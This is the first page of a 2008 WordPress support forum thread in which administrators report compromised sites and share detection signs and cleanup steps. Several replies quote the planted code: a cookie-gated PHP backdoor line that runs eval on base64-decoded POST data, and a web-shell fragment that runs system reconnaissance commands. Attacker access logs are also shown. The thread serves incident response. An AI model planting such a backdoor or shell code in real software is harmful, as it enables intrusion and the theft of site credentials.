Title: Security issue, multiple sites
Last modified: August 19, 2016

---

# Security issue, multiple sites

 *  [Summer](https://wordpress.org/support/users/fpmsummer/)
 * (@fpmsummer)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/)
 * This issue actually involves several sites, running versions 2.1.3, 2.3, 2.3.1,
   2.3.2, 2.3.3 and 2.5
 * A couple of the sites had wp-content/uploads writable so they could upload images
   for use in posts, and files in wp-content/themes writable so they could make 
   theme updates from inside WP.
 * Back in early March, I found that several sites had been hit with the [ro8kfbsmag.txt](http://wordpress.org/support/topic/141041)
   hack as mentioned in several threads here, and I’d cleaned those up and upgraded
   to 2.3.3, since 2.5 wasn’t yet available as a release.
 * This past weekend, I discovered several of those sites plus a few additional 
   ones, including 2 brand new sites with 2.5 installed, had many of their files
   in the writable directories compromised, a bunch of suspicious files uploaded,
   and database modifications that I cannot explain.
 * I’m still trying to unravel the mess and clean it up, but here’s a rundown of
   tell-tale signs I’ve found.
 * Check any .php file for this code added to the top of the file:
    `<?php if(md5(
   $_COOKIE['_wp_debugger'])=="--hash excised--"){ eval(base64_decode($_POST['file']));
   exit; } ?>`
 * See if there are any files in writable directories that have the same named as
   an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg,
   or .php.giff. These files will be executables that when called from a browser
   will display a fake “404 Not Found” error, but if called from a script with the
   matching hash from one of the hacked PHP scripts, will display system info about
   the server your site is sitting on. Haven’t yet figured out where or how that
   info is sent to anyone.
 * I can send a copy of the script to anyone in WP security if needed, but I don’t
   know if this kind of thing is preferred to be attached, inline, or zipped, or
   anything.
 * Also see if there’s a wp-info.txt file anywhere in your hierarchy. This file 
   will contain userinfo dumped from the MySQL database… usernames, emails, passwords,
   everything. Move it ASAP, but check your logs to see if it was accessed already.
 * One other thing I noticed, and this happened on the new 2.5 installs as well 
   as the older ones that hadn’t been upgraded yet, was the silent addition of the
   user “WordPress”, with no info save a password, and an add date of all zeroes.
   There’s also no indication of user level in the database, and the user doesn’t
   show up in the User menu. However, when I was going through and deleting unnecessary“
   admin” logins, “WordPress” came up as one of the user options to reassign posts
   to… otherwise it might have been a while before I’d found that buried in the 
   database.
 * So I’ve asked all the users on those sites to update their passwords, even if
   they’d just changed them after the ro8kfbsmag hack, but I have to wonder if I
   missed anything when cleaning up after that hack that they used to continue to
   get in and do the more widespread and scary stuff of planting of these new scripts
   to collect system info.
 * As far as I can tell, some of these sites may have been compromised for as long
   as a month, but all of the added files I’ve listed here were added on Apr 10 
   and Apr 11, except for one site that seems to have had those changes made on 
   Apr 5.
 * I am in the process of changing the DB passwords on those sites, and deleting
   the new “WordPress” user, but any insight on where this might have started would
   be welcomed. This new user also happened on sites ranging from 2.1 to 2.3 to 
   2.5
 * What I don’t know yet is if one site was the “in” door, and the rest were compromised
   by the one script, or if the sites were individually hacked the same way.

Viewing 15 replies - 1 through 15 (of 53 total)

1 [2](https://wordpress.org/support/topic/security-issue-multiple-sites/page/2/?output_format=md)
[3](https://wordpress.org/support/topic/security-issue-multiple-sites/page/3/?output_format=md)
[4](https://wordpress.org/support/topic/security-issue-multiple-sites/page/4/?output_format=md)
[→](https://wordpress.org/support/topic/security-issue-multiple-sites/page/2/?output_format=md)

 *  Thread Starter [Summer](https://wordpress.org/support/users/fpmsummer/)
 * (@fpmsummer)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-739893)
 * Addendum: I only just noticed this this morning while still cleaning up, and 
   it seems like they changed the WP version to 2.5 in the database.
 * I’m logged into a site I know is still running 2.1.3, but the footer in the admin
   panels say 2.5 now. I still haven’t found a clue about this invisible user “WordPress”
   with no info about privileges, though.
 *  [Roy](https://wordpress.org/support/users/gangleri/)
 * (@gangleri)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-739959)
 * There already is a thread about this subject and that one has just become active
   again. Maybe you want to join:
    [http://wordpress.org/support/topic/141041?replies=30](http://wordpress.org/support/topic/141041?replies=30)
 *  [jedsundwall](https://wordpress.org/support/users/jedsundwall/)
 * (@jedsundwall)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740014)
 * [@gangleri](https://wordpress.org/support/users/gangleri/),
 * I think FPMSummer is experiencing something different that what’s being discussed
   on that other thread. I’m having the EXACT same problem. I’ve had to revert my
   server to a week and a half old backup. It’s a huge pain. I can’t tell if they
   accessed the wp-info.txt, but I deleted it right away.
 *  Thread Starter [Summer](https://wordpress.org/support/users/fpmsummer/)
 * (@fpmsummer)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740015)
 * Ganglieri,
 * that’s a different hack, but one that hit some sites on our ISP’s shared server
   back in January/February. They removed like 8-10 instances of that .txt file.
 * Jed,
 * what version(s) of WP are you running? I had thought that a 2.3.x site that still
   had user registration turned on might be responsible, but at this point I honestly
   don’t know where the first point of entry was, and I’m still not sure all of 
   the users on this server have changed their passwords. I have changed all the
   database passwords, though.
 *  [jedsundwall](https://wordpress.org/support/users/jedsundwall/)
 * (@jedsundwall)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740016)
 * Like you, I had a number of sites running different versions. I believe most 
   of them were the latest version before 2.5 was released. It’s difficult to tell
   because the hacker has changed all of my WP dashboards to say they’re running
   2.5.
 * All of the weird files showed up on April 10th or 11th, and I didn’t notice them
   until today. My hosting company keep server logs for more than a couple of days,
   so I can’t tell what the point of entry was either.
 * I’m sorry I’m not of much help. All I know is that nothing obviously bad has 
   happened yet. As soon as my server’s finished reverting back to April 5th, I’ll
   be upgrading everything right away.
 *  [appleo](https://wordpress.org/support/users/appleo/)
 * (@appleo)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740019)
 * No real answers here either. This is just to confirm a similar situation. A server
   with 100+ vhosted accounts, and almost all the wordpress installations (various
   versions thru 2.5) were seemingly hit. All on the 11th, and every one within 
   several minutes, according to timestamps. Which would seem to argue for a single
   point of entry. But the sheer volume (hundreds of files) might suggest otherwise.
   Almost everything was either a wordpress file, or something disguised to look
   like a wordpress file. The script did look for writable areas, and occasionally
   found non-wordpress stuff, but that was the exception. There were two signatures.
   Files altered as FPMSummer posted with the first line changed. And new files 
   where all the voodoo was (422 lines), with the first line:
 * `<?php if(md5($_COOKIE['qwerty'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){`
 * I believe all of these were ‘qwerty’ cookies. Grepping for either of those cookie
   names will find all the filesystem damage. A sample of that code:
 *     ```
       if(!$safe_mode){^M
       if($os_type == 'nix'){^M
       $os .= execute('sysctl -n kern.ostype');^M
       $os .= execute('sysctl -n kern.osrelease');^M
       $os .= execute('sysctl -n kernel.ostype');^M
       $os .= execute('sysctl -n kernel.osrelease');^M
       if(empty($user)) $user = execute('id');^M
       $aliases = array(^M
       '' => '',^M
       'find suid files'=>'find / -type f -perm -04000 -ls',^M
       'find sgid files'=>'find / -type f -perm -02000 -ls',^M
       'find all writable files in current dir'=>'find . -type f -perm -2 -ls',^M
       'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',^M
       'find all writable directories and files in current dir'=>'find . -perm -2 -ls',^M
       'show opened ports'=>'netstat -an | grep -i listen',^M
       );^M
       }else{^M
       $os_name .= execute('ver');^M
       $user .= execute('echo %username%');^M
       $aliases = array(^M
       '' => '',^M
       'show runing services' => 'net start',^M
       'show process list' => 'tasklist'^M
       );^M
       }^M
       }^
       ```
   
 *  Thread Starter [Summer](https://wordpress.org/support/users/fpmsummer/)
 * (@fpmsummer)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740020)
 * Yep, that’s exactly what showed up on my sites, and all on Apr 10 and Apr 11.
   The Apr 11 happened in two waves, 3 hours apart. The first batch of files seemed
   to have all been renamed _old.php, and the second batch of files were the exact
   same files, but with _new.php.
 * I had a lot of WP files with that qwerty cookie added, and several instances 
   of the wp-info.txt with the mysql usernames/passwords dump.
 * I did find one file dated Apr 5, but I also saw a lot of log activity going back
   into March.
 * And how did they change my Dashboard to show WP 2.5, when they weren’t running
   2.5?
 *  [s](https://wordpress.org/support/users/sofimi/)
 * (@sofimi)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740022)
 * guys, i think somebody should “name” this vulnerability so it’s easier to remember.
   also, i wrote about it [here](http://wordpressphilippines.org/blog/has-your-wordpress-been-hacked-recently/).
 * yep, it happened to me too. i first saw the version 2.5 string in the footer 
   and was immediately suspicious, but at first i thought it was because i used 
   the wpau plugin instead of the cpanel upgrade (which i used to install wp the
   first time around). turns out you have to trust your instincts. 🙂
 * i’m also surprised all this happened on april 11 (mine on the 12th) as well.
 * i’ve been watching this page and will continue to do so. i hope more people contribute
   because it was only a few days ago when i tried googling “wp-info.txt” and practically
   nothing came up.
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740023)
 * I would agree with anyone who says this isnt just a 2.5 problem
 * [http://www.enunabaldosa.com/deformaciones/wp-includes/wp-info.txt](http://www.enunabaldosa.com/deformaciones/wp-includes/wp-info.txt)
 * The file itself appears to be gone. but because of google we can get more info
 * [http://64.233.167.104/search?q=cache:5AHDLvNRQt8J:www.enunabaldosa.com/deformaciones/wp-includes/+wp-info.txt&hl=en&ct=clnk&cd=22&gl=us](http://64.233.167.104/search?q=cache:5AHDLvNRQt8J:www.enunabaldosa.com/deformaciones/wp-includes/+wp-info.txt&hl=en&ct=clnk&cd=22&gl=us)
 * That’s a 2.3.3 install **now**. There’s no telling what it was on March 19
 * —
 * Futhermore, people running anything other than 2.3.3, 2.5, or 2.0.11 have taken
   their security into their own hands for some time, and really ought not be surprised
   to wake up to a site that has been exploited.
 *  [here](https://wordpress.org/support/users/here/)
 * (@here)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740025)
 * Codex page will hopefully help document:
 * [http://codex.wordpress.org/Exploits/wp-info](http://codex.wordpress.org/Exploits/wp-info)
 *  [goodspeed1](https://wordpress.org/support/users/goodspeed1/)
 * (@goodspeed1)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740027)
 * We experienced everything mentioned above over the last couple of days. April
   6th & 12th. It seems systematic. Once the accounts have been compromised. The
   hacking began.
 * Here’s a few more insights on what happened: [http://www.abelcheung.org/advisory/20071210-wordpress-charset.txt](http://www.abelcheung.org/advisory/20071210-wordpress-charset.txt)
 * steps taken:
 * 1. Changed the admin (level 10) account passwords
    2. Deleted the ‘mysterious’
   WordPress admin user 3. Upgraded most of major blogs to 2.5
 * So far so good. (crossing my fingers)
 *  [here](https://wordpress.org/support/users/here/)
 * (@here)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740031)
 * The wiki page was moved to [http://codex.wordpress.org/User:Here/Exploits/wp-info](http://codex.wordpress.org/User:Here/Exploits/wp-info)
 *  [indigothirdeye](https://wordpress.org/support/users/indigothirdeye/)
 * (@indigothirdeye)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740033)
 * The hack I believe used a vulnerability in the wp-admin/theme-editor.php. Luckily,
   we have a script that checks for code changes, and caught the exploit within 
   a half hour of the attack. The logs from our site that was hacked had this in
   the logs:
 *     ```
       194.110.162.79 - - [15/Apr/2008:14:40:02 -0700] "GET /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 30
       2 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
       194.110.162.79 - - [15/Apr/2008:14:40:03 -0700] "GET /wp-login.php?redirect_to=%2Fwp-admin%2Ftheme-editor.php%3Ffile%3Dwp-content%2Fthemes%2Fdefault%2Findex.
       php%26theme%3DWordPress%2BDefault HTTP/1.1" 200 2043 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
       194.110.162.79 - - [15/Apr/2008:14:40:03 -0700] "GET /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 20
       0 9620 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
       194.110.162.79 - - [15/Apr/2008:14:40:04 -0700] "POST /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 3
       02 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
       194.110.162.79 - - [15/Apr/2008:14:40:04 -0700] "GET /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default&a=te HTTP/1.
       1" 200 9832 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
       194.110.162.79 - - [15/Apr/2008:14:40:05 -0700] "POST /wp-content/themes/default/index.php HTTP/1.1" 200 43 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
       US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
       194.110.162.79 - - [15/Apr/2008:14:40:06 -0700] "POST /wp-content/themes/default/index.php HTTP/1.1" 200 7895 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; e
       n-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
       194.110.162.79 - - [15/Apr/2008:14:40:07 -0700] "POST /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 3
       02 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
       194.110.162.79 - - [15/Apr/2008:14:40:08 -0700] "GET /wp-login.php HTTP/1.1" 200 1835 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/
       20070309 Firefox/2.0.0.3"
       ```
   
 * Both sites had the WordPress and WordPressx user added to the wp-users table.
   Neither had a wp-info.txt luckily, but many of the .giff and .pngg’s were found.
   There were also 2 files in the /tmp/ directory numbered 1 and 2 with full directory
   listings of the sites. We immediately launched a “Deny any” on the theme-editor.
   php files to prevent further attacks using this method and cleaned up what we
   could find.
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740035)
 * thats **not** the exploit. thats the file access that done after someone has 
   admin access. AND if you attempt to call that file without being logged in, and
   having the proper permissions, you will find you are promptly redirected to logging
   in, just as you ought to be
 * You cannot access that file as a simple subscriber. You must be an admin
 * Devs (Donncha, specifically) has already looked at something similar weeks ago,
   when I originally saw it happening on another blog that hand been exploited.
 * Want to know what ultimtely solved the hacking?
 * 1. upgrading the blog
    2. changing the admin passwords 3. changing all the cookies.
 * and the deny all.. that just forces apache to do work it doesnt need to. If you’re
   going to block everyone from using the file, delete it, or crtl-k the content.
 * You dont gain anything by looking at 403’s — theyre all proxies or rooted shells.
 * None of this is new, and Im willing to continue playing devil’s advocate and 
   say that until someone comes up with real evidence that 2.5, or even 2.3 is the
   root cause of the problem.. that it’s useless conjecture and fear mongering.
 * If someone has admin access they do can do whatever your file permissions allow,
   it’s just that simple. And if they can write to a file, they can create a root
   shell. If they can create a root shell, they can add users to your database, 
   etc.. They also no longer need admin access once the php root shell is in place.
 * Thats why when a new version comes out, ppl are urged to upgrade. Countless numbers
   dont.
 * This is specifically why I have suggested setting up logging on some of these
   blogs —
 * 1. youre missing the key piece of the puzzle : how they got admin access in the
   first place.
 * —
 * In fact, you posted the login in your paste above. They can be seen logging in.
 *  [s](https://wordpress.org/support/users/sofimi/)
 * (@sofimi)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740039)
 * yeah, i do want to know how they got admin access as well. fyi, after i wrote
   about this security issue, the “WordPress” user appeared in the database(s) again.
   does this mean i’d have to generate new database passwords all over again? sigh.

Viewing 15 replies - 1 through 15 (of 53 total)

1 [2](https://wordpress.org/support/topic/security-issue-multiple-sites/page/2/?output_format=md)
[3](https://wordpress.org/support/topic/security-issue-multiple-sites/page/3/?output_format=md)
[4](https://wordpress.org/support/topic/security-issue-multiple-sites/page/4/?output_format=md)
[→](https://wordpress.org/support/topic/security-issue-multiple-sites/page/2/?output_format=md)

The topic ‘Security issue, multiple sites’ is closed to new replies.

## Tags

 * [database](https://wordpress.org/support/topic-tag/database/)
 * [hacked](https://wordpress.org/support/topic-tag/hacked/)
 * [password](https://wordpress.org/support/topic-tag/password/)
 * [permissions](https://wordpress.org/support/topic-tag/permissions/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 53 replies
 * 32 participants
 * Last reply from: [teragram](https://wordpress.org/support/users/teragram/)
 * Last activity: [17 years, 3 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/page/4/#post-740243)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics
